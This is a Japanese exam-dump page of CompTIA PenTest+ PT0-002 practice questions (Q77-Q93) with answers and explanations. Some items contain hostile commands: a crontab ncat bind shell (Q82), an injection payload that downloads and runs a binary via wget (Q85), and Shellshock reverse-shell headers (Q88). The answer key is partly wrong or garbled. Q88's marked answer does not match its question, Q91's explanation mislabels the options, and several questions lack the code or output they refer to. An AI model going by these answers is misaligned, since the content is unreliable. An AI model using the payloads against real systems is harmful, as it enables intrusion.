2024年最新の実際に出ると確認されたPT0-002試験問題集と解答でPT0-002無料更新 [Q77-Q93]

Share

2024年最新の実際に出ると確認されたPT0-002試験問題集と解答でPT0-002無料更新

実際問題を使ってPT0-002問題集で100%無料PT0-002試験問題集


CompTIA PT0-002:CompTIA PenTest認定試験は、CompTIAが提供する最新の認定試験です。サイバーセキュリティプロフェッショナルがペネトレーションテストの概念や手法の理解を深めたい場合に設計されています。試験は、計画と範囲設定、情報収集と脆弱性の特定、攻撃、攻撃後技術、報告とコミュニケーションなど、ペネトレーションテストのすべての重要な側面をカバーしています。


Comptia Pentest+認定試験では、倫理的ハッキングと脆弱性スキャンに関する候補者の専門知識をテストします。計画とスコーピング、情報収集と脆弱性の識別、攻撃、悪用、浸透テストツール、報告とコミュニケーションなどの重要なドメインをカバーしています。

 

質問 # 77
A company is concerned that its cloud VM is vulnerable to a cyberattack and proprietary data may be stolen.
A penetration tester determines a vulnerability does exist and exploits the vulnerability by adding a fake VM instance to the IaaS component of the client's VM. Which of the following cloud attacks did the penetration tester MOST likely implement?

  • A. Malware injection
  • B. Credential harvesting
  • C. Cross-site scripting
  • D. Direct-to-origin

正解:A

解説:
Explanation
Malware injection is the most likely cloud attack that the penetration tester implemented, as it involves adding a fake VM instance to the IaaS component of the client's VM. Malware injection is a type of attack that exploits vulnerabilities in cloud services or applications to inject malicious code or data into them. The injected malware can then compromise or control the cloud resources or data.


質問 # 78
A penetration tester wrote the following script to be used in one engagement:

Which of the following actions will this script perform?

  • A. Listen for a reverse shell.
  • B. Attempt to flood open ports.
  • C. Create an encrypted tunnel.
  • D. Look for open ports.

正解:D


質問 # 79
During a code review assessment, a penetration tester finds the following vulnerable code inside one of the web application files:
<% String id = request.getParameter("id"); %>
Employee ID: <%= id %>
Which of the following is the best remediation to prevent a vulnerability from being exploited, based on this code?

  • A. Parameterized queries
  • B. Patch application
  • C. Output encoding

正解:C

解説:
Output encoding is a technique that prevents cross-site scripting (XSS) attacks by encoding the user input before displaying it on the web page. This way, any malicious scripts or HTML tags are rendered harmless and cannot execute on the browser. Output encoding is recommended by the OWASP Top 10 as a defense against XSS1. In this case, the vulnerable code is using a scriptlet to display the employee ID without any validation or encoding, which could allow an attacker to inject malicious code through the id parameter. Output encoding would prevent this by escaping any special characters in the id parameter. Reference: The Official CompTIA PenTest+ Student Guide (Exam PT0-002) eBook, Chapter 4, Section 4.2.1: Cross-site Scripting; Best PenTest+ certification study resources and training materials, Section 1: Cross-site Scripting (XSS) Attack; OWASP Top 10 2021, A7: Cross-site Scripting (XSS).


質問 # 80
A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some of the files that were discovered through this vulnerability are:

Which of the following is the BEST method to help an attacker gain internal access to the affected machine?

  • A. Download .pl files and look for usernames and passwords
  • B. Download the smb.conf file and look at configurations
  • C. Edit the smb.conf file and upload it to the server
  • D. Edit the discovered file with one line of code for remote callback

正解:C


質問 # 81
The provision that defines the level of responsibility between the penetration tester and the client for preventing unauthorized disclosure is found in the:

  • A. SOW
  • B. NDA
  • C. MSA
  • D. SLA

正解:B

解説:
Explanation
The provision that defines the level of responsibility between the penetration tester and the client for preventing unauthorized disclosure is found in the NDA, which stands for Non-Disclosure Agreement. The NDA is a legal agreement between two or more parties that outlines confidential material or knowledge that the parties wish to share with one another, but with restrictions on access, use or disclosure of that information.
The NDA is commonly used in the context of penetration testing to protect the client's sensitive information that the tester may have access to during the engagement.
The NDA defines the terms of confidentiality and non-disclosure of information related to the engagement, including the responsibilities and obligations of both the tester and the client to ensure that any information exchanged or obtained during the engagement is kept confidential and not disclosed to unauthorized parties.
This is particularly important in penetration testing, as the tester is granted access to the client's network and systems, and may uncover vulnerabilities or sensitive information that should not be disclosed to unauthorized parties.
In summary, the NDA plays a crucial role in defining the level of responsibility between the penetration tester and the client for preventing unauthorized disclosure of confidential information, and is an important legal instrument for protecting the client's sensitive information during a penetration testing engagement.


質問 # 82
A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop. Which of the following can be used to ensure the tester is able to maintain access to the system?

  • A. sudo useradd -ou 0 -g 0 user
  • B. wmic startup get caption,command
  • C. crontab -l; echo "@reboot sleep 200 && ncat -lvp 4242 -e /bin/bash") | crontab 2>/dev/null
  • D. schtasks /create /sc /ONSTART /tr C:\Temp\WindowsUpdate.exe

正解:D


質問 # 83
In Python socket programming, SOCK_DGRAM type is:

  • A. slower.
  • B. connectionless.
  • C. reliable.
  • D. matrixed.

正解:B

解説:
Explanation
In Python socket programming, SOCK_DGRAM type is connectionless. This means that the socket does not establish a reliable connection between the sender and the receiver, and does not guarantee that the packets will arrive in order or without errors. SOCK_DGRAM type is used for UDP (User Datagram Protocol) sockets, which are faster and simpler than TCP (Transmission Control Protocol) sockets3.


質問 # 84
Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?

  • A. Stop the assessment and inform the emergency contact.
  • B. Do a root-cause analysis to find out how the malware got in.
  • C. Collect the proper evidence and then remove the malware.
  • D. Remove the malware immediately.
  • E. Analyze the malware to see what it does.

正解:A


質問 # 85
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:
exploit = "POST "
exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS
&loginUser=a&Pwd=a"
exploit += "HTTP/1.1"
Which of the following commands should the penetration tester run post-engagement?

  • A. chmod 600 /tmp/apache
  • B. rm -rf /tmp/apache
  • C. taskkill /IM "apache" /F
  • D. grep -v apache ~/.bash_history > ~/.bash_history

正解:B

解説:
Explanation
The exploit code is a command injection attack that uses a vulnerable CGI script to execute arbitrary commands on the target system. The commands are:
cd /tmp: change the current directory to /tmp
wget
http://10.10.0.1/apache: download a file named apache from http://10.10.0.1 chmod 777 apache: change the permissions of the file to allow read, write, and execute for everyone
./apache: run the file as an executable
The file apache is most likely a malicious payload that gives the attacker remote access to the system or performs some other malicious action. Therefore, the penetration tester should run the command rm -rf
/tmp/apache post-engagement to remove the file and its traces from the system. The other commands are not effective or relevant for this purpose.


質問 # 86
Which of the following OSSTM testing methodologies should be used to test under the worst conditions?

  • A. Reversal
  • B. Known environment
  • C. Tandem
  • D. Semi-authorized

正解:B

解説:
The OSSTM testing methodology that should be used to test under the worst conditions is known environment, which is a testing approach that assumes that the tester has full knowledge of the target system or network, such as its architecture, configuration, vulnerabilities, or defenses. A known environment testing can simulate a worst-case scenario, where an attacker has gained access to sensitive information or insider knowledge about the target, and can exploit it to launch more sophisticated or targeted attacks. A known environment testing can also help identify the most critical or high-risk areas of the target, and provide recommendations for improving its security posture. The other options are not OSSTM testing methodologies that should be used to test under the worst conditions. Tandem is a testing approach that involves two testers working together on the same target, one as an attacker and one as a defender, to simulate a realistic attack scenario and evaluate the effectiveness of the defense mechanisms. Reversal is a testing approach that involves switching roles between the tester and the client, where the tester acts as a defender and the client acts as an attacker, to assess the security awareness and skills of the client. Semi-authorized is a testing approach that involves giving partial or limited authorization or access to the tester, such as a user account or a network segment, to simulate an attack scenario where an attacker has compromised a legitimate user or device.


質問 # 87
A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment?

  • A. A signed statement of work
  • B. The expected time frame of the assessment
  • C. The proper emergency contacts for the client
  • D. The correct user accounts and associated passwords

正解:D


質問 # 88
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:
exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept":
"text/html,application/xhtml+xml,application/xml"}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

  • A. exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept":
    "text/html,application/xhtml+xml,application/xml"}
  • B. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept":
    "text/html,application/xhtml+xml,application/xml"}
  • C. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1", "Accept":
    "text/html,application/xhtml+xml,application/xml"}
  • D. exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept":
    "text/html,application/xhtml+xml,application/xml"}

正解:C


質問 # 89
A penetration tester executes the following Nmap command and obtains the following output:

Which of the following commands would best help the penetration tester discover an exploitable service?
A)

B)

C)

D)

  • A. nmap --ocript=omb-brute.noe remotehoat
  • B. nmap -p 3306 -- script "http*vuln*" remotehost
  • C. nmap -v -- script=mysql-info.nse remotehost
  • D. nmap -v -p 25 -- soript smtp-enum-users remotehost

正解:C

解説:
The Nmap command in the question scans all ports on the remote host and identifies the services and versions running on them. The output shows that port 3306 is open and running MariaDB, which is a fork of MySQL.
Therefore, the best command to discover an exploitable service would be to use the mysql-info.nse script, which gathers information about the MySQL server, such as the version, user accounts, databases, and configuration variables. The other commands are either misspelled, irrelevant, or too broad for the task. References: Best PenTest+ certification study resources and training materials, CompTIA PenTest+ PT0-002 Cert Guide, 101 Labs - CompTIA PenTest+: Hands-on Labs for the PT0-002 Exam


質問 # 90
Which of the following types of assessments MOST likely focuses on vulnerabilities with the objective to access specific data?

  • A. An unknown-environment assessment
  • B. A known-environment assessment
  • C. A red-team assessment
  • D. A compliance-based assessment

正解:C

解説:
A red-team assessment is a type of penetration testing that simulates a real-world attack scenario with the goal of accessing specific data or systems. A red-team assessment is different from an unknown-environment assessment, which does not have a predefined objective and focuses on discovering as much information as possible about the target. A known-environment assessment is a type of penetration testing that involves cooperation and communication with the target organization, and may not focus on specific data or systems. A compliance-based assessment is a type of penetration testing that aims to meet certain regulatory or industry standards, and may not focus on specific data or systems.


質問 # 91
A penetration tester is conducting an Nmap scan and wants to scan for ports without establishing a connection.
The tester also wants to find version data information for services running on Projects. Which of the following Nmap commands should the tester use?

  • A. ..nmap -sS -sV -F target.company.com
  • B. ..nmap -sT -v -T5 target.company.com
  • C. ..nmap -sU -sV -T4 -F target.company.com
  • D. ..nmap -sX -sC target.company.com

正解:A

解説:
Explanation
The Nmap command that the tester should use to scan for ports without establishing a connection and to find version data information for services running on open ports is nmap -sS -sV -F target.company.com. This command has the following options:
-sS performs a TCP SYN scan, which is a scan technique that sends TCP packets with the SYN flag set to the target ports and analyzes the responses. A TCP SYN scan does not establish a full TCP connection, as it only completes the first step of the three-way handshake. A TCP SYN scan can stealthily scan for open ports without alerting the target system or application.
-sV performs version detection, which is a feature that probes open ports to determine the service and version information of the applications running on them. Version detection can provide useful information for identifying vulnerabilities or exploits that affect specific versions of services or applications.
-F performs a fast scan, which is a scan option that only scans the 100 most common ports according to the nmap-services file. A fast scan can speed up the scan process by avoiding scanning less likely or less interesting ports.
target.company.com specifies the domain name of the target system or network to be scanned.
The other options are not valid Nmap commands that meet the requirements of the question. Option A performs a UDP scan (-sU), which is a scan technique that sends UDP packets to the target ports and analyzes the responses. A UDP scan can scan for open ports that use UDP protocol, such as DNS, SNMP, or DHCP.
However, a UDP scan does establish a connection with the target system or application, unlike a TCP SYN scan. Option C performs a TCP connect scan (-sT), which is a scan technique that sends TCP packets with the SYN flag set to the target ports and completes the three-way handshake with an ACK packet if a SYN/ACK packet is received. A TCP connect scan can scan for open ports that use TCP protocol, such as HTTP, FTP, or SSH. However, a TCP connect scan does establish a full TCP connection with the target system or application, unlike a TCP SYN scan. Option D performs an Xmas scan (-sX), which is a scan technique that sends TCP packets with the FIN, PSH, and URG flags set to the target ports and analyzes the responses. An Xmas scan can stealthily scan for open ports without alerting the target system or application, similar to a TCP SYN scan.
However, option D does not perform version detection (-sV), which is one of the requirements of the question.


質問 # 92
Given the following code:

Which of the following data structures is systems?

  • A. A dictionary
  • B. A tuple
  • C. A tree
  • D. An array

正解:A

解説:
A dictionary is a data structure in Python that stores key-value pairs, where each key is associated with a value. A dictionary is created by enclosing the key-value pairs in curly braces and separating them by commas.
A dictionary can be accessed by using the keys as indexes or by using methods such as keys(), values(), or items(). In the code, systems is a dictionary that has four key-value pairs, each representing an IP address and its corresponding operating system. A tuple is a data structure in Python that stores an ordered sequence of immutable values, enclosed in parentheses and separated by commas. A tree is a data structure that consists of nodes connected by edges, forming a hierarchical structure with a root node and leaf nodes. An array is a data structure that stores a collection of elements of the same type in a contiguous memory location.


質問 # 93
......

合格させるPT0-002試験問題は更新された360問あります:https://jp.fast2test.com/PT0-002-premium-file.html

PT0-002試験問題集、テストエンジン練習テスト問題:https://drive.google.com/open?id=14kCDLf2HnqUlEI-cUnzYi75jcGG7lxaK


弊社を連絡する

我々は12時間以内ですべてのお問い合わせを答えます。

我々の働いている時間: ( GMT 0:00-15:00 )
月曜日から土曜日まで

サポート: 現在連絡 

English Deutsch 繁体中文 한국어